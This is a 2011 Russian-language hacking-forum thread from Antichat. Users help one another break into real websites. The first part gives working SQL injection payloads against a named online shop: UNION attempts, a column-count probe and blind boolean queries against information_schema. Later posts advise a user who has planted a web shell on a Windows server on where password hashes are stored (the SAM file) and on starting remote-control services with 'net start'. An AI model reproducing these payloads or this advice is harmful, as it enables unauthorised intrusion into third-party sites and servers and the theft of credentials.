ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.08.2011, 15:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
60692
Репутация:
6
|
|
http://aqua-st.ru/catalog/102
Помогите! Обычные трюки не проходят!
|
|
|
|
22.08.2011, 16:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Kuteke
Kuteke said:
http://aqua-st.ru/catalog/102
Помогите! Обычные трюки не проходят!
Обычное внедрение SQL-кода в запрос:
Код:
Code:
SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ...
Можно просто сделать так:
Код:
Code:
1) and 1=2 UNION SELECT ...#
Советую обратиться к документации MySQL.
|
|
|
22.08.2011, 21:12
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от XAMEHA
XAMEHA said:
Обычное внедрение SQL-кода в запрос:
Код:
Code:
SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ...
Можно просто сделать так:
Код:
Code:
1) and 1=2 UNION SELECT ...#
Советую обратиться к документации MySQL. Что-то не получается вывести так версию БД
Покажи запрос полностью.
http://aqua-st.ru/catalog/102%20order%20by%201#
|
|
|
|
22.08.2011, 23:38
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от FlaktW
FlaktW said:
Что-то не получается вывести так версию БД
Покажи запрос полностью.
http://*******.ru/catalog/102%20order%20by%201#
http://*******.ru/catalog/102)and(0)=(1)union(select(1),2,3)#
Если твой браузер не отправляет в запросах символ '#', используй сниферы с возможностью изменения запросов на лету (в Charles - Ctrl+Shift+W, Rules, Type=Path, Match=^(.*)$, Replace=$1#)
Число столбцов подбирать придется вручную. Возможно, я ошибаюсь, но их не менее 999
upd:
Все-таки ошибся.
При правильном количестве столбцов ошибки в запросе
Сообщение от None
SELECT * FROM products WHERE category_id in ([SQLi]) and hidden=0 order by order_no
больше нет. Но она есть во втором запросе
Сообщение от None
SELECT distinct sizes FROM products WHERE hidden=0 AND category_id in ([SQLi]) ORDER BY sizes
Как видно из второго запроса, он вызовет ту же ошибку, поэтому софт пропустил правильное количество при прямом переборе.
Использовать union не получится. Только как слепую крутить.
Столбцов, как оказалось, 27.
102)and(1)=if(((select(count(*))from(information_s chema.columns)where(table_name=0x70726F6475637473) and(table_schema=database()))>26),1,0)#
true
102)and(1)=if(((select(count(*))from(information_s chema.columns)where(table_name=0x70726F6475637473) and(table_schema=database()))>27),1,0)#
false
|
|
|
|
23.08.2011, 06:44
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
# - %23
% - %25
Это надо запомнить, и не мучиться с Charles(В большинстве случаев).
|
|
|
|
23.08.2011, 18:24
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от XAMEHA
XAMEHA said:
# - %23
% - %25
Это надо запомнить, и не мучиться с Charles(В большинстве случаев).
Че правда так можно? Не обманываешь?
Ты пример посмотри. Там не в параметрах инъекция.
|
|
|
|
23.08.2011, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
54576
Репутация:
8
|
|
Сообщение от Cherep
Cherep said:
залил шелл на 1 сайт. Система, на которой стоит сайт, винда. Открыт порт для удаленного управления компьютером. Мб кто подскажет, где хранится пароль от учетки? Или есть какиенибудь другие варианты, для удаленного управления компом? Хотел попробывать радмин залить, но боюсь что будет блочить фаер. Заранее спасибо
Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.
|
|
|
|
23.08.2011, 19:50
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от R0nin
R0nin said:
Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.
я второго юзера через батник сделал, но всёравно спасибо)
|
|
|
|
23.08.2011, 22:46
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
можно какнибудь запустить службу удаленного управления компьютером через встроеную в всо консоль?
|
|
|
|
23.08.2011, 23:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от Cherep
Cherep said:
можно какнибудь запустить службу удаленного управления компьютером через встроеную в всо консоль?
ну если у тебя получилось запустить батник, почему бы и не запускать службы ?
net start "имя службы"
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
